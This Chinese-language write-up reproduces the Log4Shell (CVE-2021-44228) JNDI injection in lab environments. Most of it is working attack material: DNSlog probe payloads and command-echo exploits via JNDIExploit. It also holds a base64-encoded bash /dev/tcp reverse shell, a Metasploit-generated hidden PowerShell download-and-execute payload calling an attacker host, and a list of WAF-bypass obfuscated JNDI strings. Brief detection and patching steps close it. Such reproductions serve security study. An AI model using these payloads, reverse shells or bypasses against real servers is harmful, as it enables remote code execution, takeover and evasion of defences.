CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux

0x00  漏洞描述

Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发，用来记录日志信息。
Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据被日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大，建议客户尽快采取措施防护此漏洞

0x01  影响范围

Apache Log4j 2.x < 2.15.0-rc2
已知受影响组件
1、Apache Struts2
2、Apache Solr
3、Apache Flink
4、Apache Druid
5、ElasticSearch
6、flume
7、dubbo
8、Redis
9、logstash
10、kafka
11.vmvare12.Spring-Boot-strater-log4j2

0x02  环境搭建

一、linux环境搭建

linxu环境下目前 Vulfocus 已经集成 Log4j2，可通过以下链接启动在线环境测试：
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行启动dokcer环境docker run  -d    -p  8080:8080   vulfocus/log4j2-rce-2021-12-09:latesthttp://192.168.1.4:8080/

二、win 本地环境

本地环境：java版本8u181，tomcat8.5.32源码包：链接：https://pan.baidu.com/s/1STgDdVb4QUm9r0t9wZZA-Q 提取码：uodmROOT.war为Tomcat启动包，删除webapps目录下的ROOT目录，将ROOT.war放入Tomcat的webapps目录下，启动Tomcat即可

0x03 漏洞利用

一、linux环境下dnslog回显

注意：Content-Type: application/x-www-form-urlencodedpost:
payload=${jndi:ldap://ti851c.dnslog.cn}dnslog回显：

二、win环境下dnslog回显

注意：Content-Type: application/x-www-form-urlencodedpost:
payload=${jndi:ldap://ti851c.dnslog.cn}

dnslog回显：

三、linux环境下命令回显

注意Content-Type: application/x-www-form-urlencoded
payload=${jndi:ldap://192.168.1.14:2222/TomcatBypass/TomcatEcho}
这里用到JNDIExploit-1.2-SNAPSHOT.jar工具启一个ldap服务https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zipjava -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222  -p 8988 -i 0.0.0.0执行，成功回显

四、win环境下命令回显

1.注意Content-Type: application/x-www-form-urlencoded
这里用到JNDIExploit-1.2-SNAPSHOT.jar工具启一个ldap服务

https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222  -p 8988 -i 0.0.0.0

2.这个是输入的payload:${jndi:ldap://10.206.14.240:2222/Basic/TomcatEcho}，使用的话IP修改为自己的起JNDI服务的IP即可,将刚才的包放入repeater，执行命令，添加自定义的header，cmd:whoami来执行

执行命令，并发送数据包，成功回显

五、linux环境下反弹shell

1.JDK下载与安装（需要JDK1.8121 版本以下）JDK下载地址：https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html2.攻击机上执行linux进行nc反弹监听命令
nc  -nvlp 2333
3.生成bash反弹命令的payload

bash -i >& /dev/tcp/192.168.1.14/2333  0>&1
4.在线网站对其payload进行编码
https://www.jackson-t.ca/runtime-exec-payloads.html
得到:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}

5.启动一个ldap服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.1.14"

6.发送payload（这里ldap协议不太行，换成rmi协议可以）因为java版本高于1.8.0_191之后，不会默认开启ldap，所以我们这里需要选择用rmi的方式来进行攻击。注意Content-Type: application/x-www-form-urlencoded

payload=${jndi:rmi://192.168.1.14:1099/zxeiar}

7.成功拿到shell

六、win环境下反弹shell

1.kali下msf生成powershell

use exploit/multi/script/web_delivery
set payload payload/windows/x64/powershell_reverse_tcp

set lhost 10.206.14.54
set target 2
run

2.生成的POCpowershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA3.本地或vps启动服务github下载JNDI-Injection-Exploit  poc:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA" -A "192.168.1.7"

4.协议根据实际情况使用，这里使用rmi协议发送数据包。${jndi:rmi://10.206.14.240:1099/6lwxbt}5.在msf中成功反弹win本地的shell.

0x04 判断方式

只需排查Java应用是否引入 log4j-api , log4j-core 两个jar。若存在应用使用，极大可能会受到影响。

0x05 漏洞排查

1.代码排查：查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2
2.linux下命令排查：

sudo find / -name "*log4j-*.jar"

3.Win下命令排查：

*log4j*.jar

4.BurpLog4j2Scan被动扫描bp插件https://github.com/tangxiaofeng7/BurpLog4j2Scan/releases/download/v1.1/BurpLog4j2Scan-1.0-SNAPSHOT.jar

0x06 修复方式

1、升级版本至log4j-2.15.0
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
2、升级 jdk11.0.1，8u191，7u201，6u211 至更高版本
紧急缓解措施
1、修改jvm  在启动项添加参数 -Dlog4j2.formatMsgNoLookups=true
2、将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置 为 true
3、修改配置 log4j2.formatMsgNoLookups=True

0x07 绕过技巧

1.绕过rc1

${jndi:ldap://127.0.0.1:1389/ badClassName}

2.绕过WAF

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

3.rce对jdk版本要求比较严格:rmi方式jdk 6u132 7u131 8u121以前；ldap方式jdk11.0.1 8u191 7u201 6u211以前

0x08 参考文献

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce https://github.com/jas502n/Log4j2-CVE-2021-44228 https://github.com/0x727/JNDIExploit
https://github.com/whwlsfb/Log4j2Scan/ https://github.com/dbgee/log4j2_rcehttps://github.com/bkfish/Apache-Log4j-Learninghttps://www.o2oxy.cn/3884.htmlhttps://www.wangt.cc/2021/12/%EF%BC%88%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E5%A4%8D%E7%8E%B0%EF%BC%89cve-2021-44228-apache-log4j-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ https://www.skyzyw.com/article/18855.html http://www.dmkxy.me/2021/12/10/Apache%20Log4j%20RCE%E6%BC%8F%E6%B4%9E/https://syunaht.com/p/2341403076.html